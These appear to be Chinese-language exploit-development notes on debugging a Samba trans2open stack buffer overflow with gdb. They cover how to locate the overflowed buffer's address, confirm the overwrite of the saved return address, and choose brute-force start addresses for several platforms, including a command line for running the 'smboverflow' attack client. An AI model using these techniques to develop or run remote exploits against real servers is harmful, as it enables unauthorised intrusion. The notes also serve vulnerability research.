☆ 漏洞调试技巧
漏洞调试技巧比较杂乱,仅仅作为笔记、备忘出现,非正式文档。
1) 在Debian/Linux中利用gdb确认fname_address
在Debian上执行"smbd -D"启动Samba Server。由于smbd采用父子进程处理方式,不 要直接调试父进程,gdb在fork()分叉处"直接跟随"子进程时有问题。变通的办法有 很多,先用"gdb ./smboverflow"启动客户端,在发送TRANSACT2_OPEN报文之前设置 一个断点,然后"r -d 192.168.7.148 -f 0xbffff000"执行客户端。客户端会中断在 预设断点处。如果客户端源代码可控,也可不用gdb启动客户端,程序自己控制在何 处暂停一下。
对于服务端,由于已经建立空会话,子进程出现,"ps auwx | grep smbd"找出子进
程PID,执行"gdb smbd
由于事先在RedHat/Linux上编译、调试过Samba Server源码,已经有一些初步知识, fname[1024]在栈区,fname_address位于[0xbffff000,0xbffffff0]之间的可能性极 大,位于[0xbfffe000,0xbffff000]之间的可能性极小。察看服务端当前栈帧:
(gdb) i r esp ebp esp 0xbffff794 0xbffff794 ebp 0xbffff85c 0xbffff85c
fname_address应该低于0xbffff794,在0xbffff400处设置监视点:
(gdb) x/wx 0xbffff400 0xbffff400: 0x0804c086 (gdb) watch ((unsigned int )0xbffff400==0x90909090) (gdb) c
执行"StrnCpy( fname, pname, namelen );"时,fname[]中出现大量0x90(NOP指令)。 假设0xbffff400位于fname[]中部,执行Strncpy()时,该处的值将变成0x90909090, 监视点被命中,程序就会中断下来。watch与SoftICE中的BPM类似,使用DR0-DR3调试 寄存器,属于硬件断点。
现在回到客户端,执行"c",发送TRANSACT2_OPEN报文。
服务端由于监视点被命中而中断下来:
(gdb) x/wx 0xbffff400
0xbffff400: 0x90909090
(gdb) x/10i $eip
0x8113d69
显然这在Strncpy()函数中,不要相信此时的符号信息。查看其返回地址、各个形参:
(gdb) x/4wx $ebp+4 0xbffff340: 0x0806e65b 0xbffff3fc 0x0820518c 0x00000449
已经找出fname_address,就是0xbffff3fc。查看call_trans2open()的栈帧:
(gdb) x/wx $ebp 0xbffff33c: 0xbffff7fc
0xbffff7fc是call_trans2open()中EBP寄存器的值。注意,fname_address加上1024 字节就等于0xbffff7fc了。这与前面所绘内存布局图有出入,中间那些局部变量不见 了,比如namelen、pname等等。
这里介绍另一个技巧,如何进行内存搜索:
(gdb) define find
OpenBSD 3.0自带的gdb 4.16.1要求我们必须对参与大小比较的各个变量进行强制类 型转换,否则行为怪异,达不到预期目的。高版本的gdb不再需要进行强制类型转换, 为了保持向后兼容性,这里仍然使用了强制类型转换。
0xbffff348是Strncpy()的形参位置。按常规理解应该还有一处地址存放0x0820518c, 那才是pname变量位置,但现在没找到。查看0x0806e65b前后的指令并对照trans2.c 源码,发现局部变量pname只在Strncpy()处使用了一次,很可能Debian中编译smbd时 打开了优化开关,导致pname只以寄存器变量形式出现,未出现在call_trans2open() 的栈帧中。这与RedHat的情形不一样,以后编写、调试exploit code时,应该注意类 似问题。
不断执行"x/20i 0x0806e65b",直至找到类似这样的汇编代码序列:
0x806e962
最后的ret指令就是call_trans2open()的最后一条返回指令,在此设置断点:
(gdb) delete 1 (gdb) b *0x806e966 Breakpoint 2 at 0x806e966 (gdb) c Continuing.
Breakpoint 2, 0x0806e966 in chroot () (gdb) x/5wx $esp-4 0xbffff7fc: 0xbffff0d0 0xbffff1b0 0xbffff0d0 0xbffff1b0 0xbffff80c: 0xbffff0d0
Original EBP、Original EIP、outbuf均被覆盖。由于客户端猜测的fname_address 是0xbffff000,因此Original EIP被覆盖成0xbffff1b0。而实际的fname_address从 0xbffff3fc开始,0xbffff1b0在NOP区外(内存低端),此次攻击必然失败。
(gdb) c Continuing.
Program received signal SIGSEGV, Segmentation fault. 0xbffff215 in ?? () (gdb)
现在回到客户端,执行"./smboverflow -d 192.168.7.148 -f 0xbffff3fc"即可溢出 成功。
这次我们运气好,设置watch监视点时正好位于fname[]中,一次命中。如果未命中, 也不要紧,等收到SIGSEGV信号后用find找出NOP区,再来一次就可以了。
当然在真实攻击中,我们不可能去目标主机上运行gdb,介绍上述技巧的目的只是便 于编写、调试exploit code,确定从何处开始暴力猜测fname_address等等。
这种技术同样适用于x86/FreeBSD,其fname_address应该从0xbfbff000开始暴力猜测。 对于x86/Solaris,其fname_address应该从0x08047000开始暴力猜测。这些值有一个 共同的特点,等于各自系统的栈底减去0x1000:
x86/Linux 栈底是0xc0000000 (栈底往低地址的4个字节总是零) SPARC/Solaris 7/8 栈底是0xffbf0000 (栈底往低地址的4个字节总是零) SPARC/Solaris 2.6 栈底是0xf0000000 (栈底往低地址的4个字节总是零) x86/Solaris 8 栈底是0x08048000 x86/FreeBSD 栈底是0xbfc00000 (栈底往低地址的4个字节总是零) x86/NetBSD 1.5 栈底是0xbfbfe000 x86/OpenBSD 2.8/3.0 栈底是0xdfbfe000
编写smboverflow.c的工作简化成两步,调试出各个平台的远程shellcode,利用"2.4 如何编程获取栈底地址"中gstack.c获取栈底地址并减去0x1000作为暴力猜测的起始 地址。